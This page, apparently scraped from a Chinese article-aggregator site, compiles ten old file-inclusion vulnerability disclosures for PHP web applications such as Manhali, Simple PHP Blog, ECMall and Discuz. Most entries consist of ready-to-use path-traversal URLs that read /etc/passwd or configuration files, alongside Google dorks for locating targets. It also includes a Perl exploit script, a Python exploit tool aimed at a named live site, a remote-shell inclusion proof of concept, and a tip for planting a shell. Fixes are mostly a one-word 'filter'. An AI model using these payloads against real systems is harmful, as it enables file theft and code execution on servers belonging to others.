Manhali v1.8本地文件包含缺陷及修复(共10篇)由网友“弯了的雨”投稿提供,下面是小编收集整理的Manhali v1.8本地文件包含缺陷及修复,仅供参考,希望能够帮助到大家。
篇1:Manhali v1.8本地文件包含缺陷及修复
标题 Manhali v1.8 Local File Inclusion Vulnerability
作者: L0n3ly-H34rT l0n3ly_h34rt@hotmail.com
程序开发: www.manhali.com/
下载地址: sourceforge.net/projects/manhali/files/manhali_1.8.zip/download
影响版本 : 1.8 (或许老版也受影响,未检查)
测试系统: Linux/Windows
############################################
# P.O.C :
/manhali/includes/download.php?f=../includes/dbconfig.php
############################################
# Greetz to my friendz
篇2:Media In Spot CMS本地文件包含缺陷及修复
#Name : Media In Spot LFI Vulnerability
#Date : May,16
#Vendor Url :http:www.mediainspot.com/
#Dork:“
”Powred By Media In Spot“”
#Author : wlhaan haker
#############################################################
Exploit:
server/path/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd
###############################################################
Fix:
demo
/view/lang/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd
/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd
/ufp/view/lang/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd
修复:过滤
篇3:media In Spot CMS本地文件包含缺陷及修复漏洞预警
#Name : Media In Spot LFI Vulnerability
#Date : May,16 2011
#Vendor Url :http:www.mediainspot.com/
#Dork:“
”Powred By Media In Spot“”
#Author : wlhaan haker
#############################################################
Exploit:
server/path/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd
###############################################################
Fix:
demo
www.badguest.cn/view/lang/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd
www.badguest.cn/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd
www.badguest.cn/ufp/view/lang/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd
修复:过滤
篇4:Ruubikcms v 1.1.0文件包含缺陷及修复
技术分析:
source of /extra/image.php:
1: if (!isset($_GET['f']) OR empty($_GET['f'])) die(“Please specify 2: image.”);
3: $fpath = BASE_DIR.$_GET['f'];
4: if (!is_file($fpath)) die(“File does not exist.”);
5:
6: // file size in bytes
7: // $fsize = filesize($fpath);
8:
9: // get mime type
10: $mtype = '';
11:
12: if (function_exists('mime_content_type')) {
13: $mtype = mime_content_type($fpath);
14: } elseif (function_exists('finfo_file')) {
15: $finfo = finfo_open(FILEINFO_MIME); // return mime type
16: $mtype = finfo_file($finfo, $fpath);
17: finfo_close($finfo);
18: }
19:
20: if ($mtype == '') {
21: $mtype = “image/jpeg”;
22: }
23:
24: header(“Content-type: $mtype”);
25: readfile($fpath); <--------------------- LFI
测试方法:
/[ruubikcms1.1.0]/extra/image.php?f=../../../../../../../../boot.ini
/[ruubikcms1.1.0]/extra/image.php?f=../../../../../../../../[localfile]
修复:过滤
篇5:Nodesforum 1.059远程文件包含缺陷及修复
# Exploit Title: nodesforum 1.059 Remote File Inclusion Vulnerability
# Google Dork: inurl: powered by Nodesforum
# Date: 6/23/
# Author: bd0rk ( bd0rk[at]hackermail.com )
# Software-Download: home.nodesforum.com/download?file=nodesforum_1.059_with_bbcode_1.004.zip
# Tested on: Ubuntu-Linux / WinVista
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerable Code in 3rd_party_limits.php line 6 - 8
--------------------------------------------------------------------------------------------------------------
$limits_cache_url=$_nodesforum_code_path.cache/.$_nodesforum_db_table_name_modifier._3rd_party_limits.php;
if(@filemtime($limits_cache_url) && @filemtime($limits_cache_url)>(time-(24*3600*14)))
{include($limits_cache_url);}
The parameter $limits_cache_url is declared with the other parameter $_nodesforum_code_path
So we can use the declared.
PoC: /nodesforum/3rd_party_limits.php?_nodesforum_code_path=[RemoteShellCode]
Fixtip: Declare $_nodesforum_code_path, likewise!
Greetings: Kathrin J., Perle, x0r_32 and ZUBAIR ANJUM ;-)
#### The 22 years old, german Hacker bd0rk #### <---white-hat
篇6:Simple PHP Blog <= 0.5.1 本地文件包含缺陷
=============================================
INTERNET SECURITY AUDITORS ALERT -005
- Original release date: March 2nd, 2009
- Last revised: December 18th, 2009
- Discovered by: Juan Galiana Lara
- Severity: 6.8/10 (CVSS scored)
=============================================
I. VULNERABILITY
-------------------------
Simple PHP Blog <= 0.5.1 Local File Include vulnerability
II. BACKGROUND
-------------------------
Simple PHP Blog is a blog system does not requires database setup, and
is very easy to install.
III. DESCRIPTION
-------------------------
Simple PHP Blog <= 0.5.1 is affected by a Local File Include
vulnerability in languages_cgi.php due to parameter blog_language1
is not properly sanitized.
IV. PROOF OF CONCEPT
-------------------------
The affected code:
62 require_once(languages/ . $_POST[ blog_language1 ] .
/strings.php);
Exploit:
#!/usr/bin/perl
# Local File Include Exploit
# Simple PHP Blog <= 0.5.1
# jgaliana isecauditors=dot=com
# Internet Security Auditors
use LWP::UserAgent;
if ($#ARGV < 3) { die(“Usage: $0
$ua = LWP::UserAgent->new;
$ua->agent(“Simple PHP Blog Exploit ^_^”);
$ua->default_header(Cookie => “sid=$ARGV[3]”);
my $req = new HTTP::Request POST =>
“$ARGV[0]$ARGV[1]/languages_cgi.php”;
$req->content_type(application/x-www-form-urlencoded);
$req->content(“blog_language1=../../../../..$ARGV[2]%00”);
my $res = $ua->request($req);
if ($res->is_success) {
print $res->content;
} else {
print “Error: ” .$res->status_line, “”;
}
$ perl simple.pl example.com /blog /etc/passwd
root:*:0:0:root:/root:/bin/bash
The bug can be exploited with or without magic_quotes_gpc, but note
that if magic_quotes_gpc is set to Off, an attacker can view any file,
adding a character like /etc/passwd, if not only can include php
files, allowing to execute any local php files.
V. BUSINESS IMPACT
-------------------------
The impact is the attacker can read arbitrary files in the context of
the webserver and execute arbitrary local php scripts.
VI. SYSTEMS AFFECTED
-------------------------
Versions prior and including 0.5.1 are affected
In order to patch the application the function file_exists() and
basename() must be added to the affected code.
VII. SOLUTION
-------------------------
Change line 62 of languages_cgi.php in order to filter $_POST[
blog_language1 ] variable.
if (ereg(^[a-zA-Z0-9_]+$, $_POST[ blog_language1 ]))
require_once(languages/ . $_POST[ blog_language1 ] . /strings.php);
VIII. REFERENCES
-------------------------
www.simplephpblog.com
sourceforge.net/projects/sphpblog/
www.isecauditors.com
IX. CREDITS
-------------------------
This vulnerability has been discovered and reported
by Juan Galiana Lara (jgaliana (at) isecauditors (dot) com).
X. REVISION HISTORY
-------------------------
March 02, 2009: Initial release.
December 18, 2009: Last revision.
XI. DISCLOSURE TIMELINE
-------------------------
March 02, 2009: Vulnerability acquired by
Internet Security Auditors (www.isecauditors.com)
March 03, 2009: Notified to developer. No response.
December 13, 2009: Notified again. No response.
December 18, 2009: Added mitigation solution and sent to lists.
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied “as-is”
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information
篇7:Pulse CMS Basic 本地文件包含漏洞及修复
Pulse CMS Basic是一款简单的内容管理系统,Pulse CMS Basic <1.29版中的index.php文件存在本地文件包含漏洞,可能导致敏感信息泄露,
[+]info:
~~~~~~~~~
'Pulse CMS Basic' Local File Inclusion Vulnerability
Mark Stanislav - mark.stanislav@gmail.com
CVE--4330
[+]poc:
~~~~~~~~~
www.example.com/index.php?p=/../../../../../../../../../../../../../../etc/passwd%00
[+]Reference:
~~~~~~~~~
www.uncompiled.com/2010/12/pulse-cms-basic-local-file-inclusion-vulnerability-cve-2010-4330/
篇8:mobile9 本地文件包含漏洞
因为他是base64编码的手工测试很麻烦就写了个小工具,高手飘过
import urllib2,sys
import httplib
import base64,time
if len(sys.argv) <= 2:
print “=” * 30
print “mobile9.com local exploit by cnb|rd Qq:441303228”
print “Email:Linuxrootkit@gmail.com”
print “=” * 30
print “usage: ” + sys.argv[0] + “ hostname ” + “ local file ”
sys.exit(1)
host = sys.argv[1]
path = sys.argv[2]
file = sys.argv[3]
h = httplib.HTTP(host)
h.putrequest(“HEAD”, path)
h.putheader(“Host”, host)
h.endheaders
okresp, reason, headers = h.getreply()
print “=” * 30
print host + “ Server Banner is ” + headers.get(“Server”)
print “=” * 30
print “Local file to read is ” + file
time = int(time.time())
serverpath = “/download/content_delivery.php?key=”
str = str(file) + “|” + str(time) + “|”
print str
base64file = base64.urlsafe_b64encode(str)
requestpath = serverpath + base64file
print base64file
print requestpath
f = httplib.HTTPConnection(host)
f.request('GET', requestpath)
print f.getresponse().read()
f.close
CSDN博客cnbird2008
篇9:ECMall本地文件包含漏洞
by Ryat
bbs.wolvez.org
respond.php 48行
$pay_code = !empty($_REQUEST['code']) ? trim($_REQUEST['code']) : '';
...
$plugin_file = ROOT_PATH . '/includes/payment/' . $pay_code . '.php';
if (is_file($plugin_file))
{
include_once($plugin_file);很明显的一个bug
利用的话可以参考flyh4t提到过[bbs.wolvez.org/topic/56/]的一个思路:
可以通过旁注拿个shell,然后写个main.php到/tmp目录下,然后包含之
篇10:DISCUZX1.5 本地文件包含漏洞漏洞预警
DISCUZX1.5 本地文件包含,当然是有条件的,就是使用文件作为缓存,
config_global.php
$_config['cache']['type'] = 'file';
function cachedata($cachenames) {
......
$isfilecache = getglobal('config/cache/type') == 'file';
......
if($isfilecache) {
$lostcaches = array();
foreach($cachenames as $cachename) {
if(!@include_once(DISCUZ_ROOT.'./data/cache/cache_'.$cachename.'.php')) {
$lostcaches[] = $cachename;
}
}
......
}
地址:
localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/uc
localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/uc
Authracation has expiried
执行了 api/uc.php 页面代码了,
作者: Jannock
★ 住宅质量保证书
★ 住宅保证书
★ 船舶修理合同
★ 住宅质量保证书
★ 机械设备管理制度
★ 谁知道IBM大型机维护人员的工资是多少Windows系统
【Manhali v1.8本地文件包含缺陷及修复(共10篇)】相关文章:
船舶维修的合同2022-10-27
行动方案范文2023-12-10
网络安全与道德作文2023-05-19
设备承诺书2022-05-14
耗材售后服务承诺书2022-06-20
一个中国黑客公开信2023-09-08
通信维护员年度个人总结2023-10-10
工程水电施工合同2022-07-28
设备售后服务承诺书2022-04-30
个人水电施工合同2022-12-22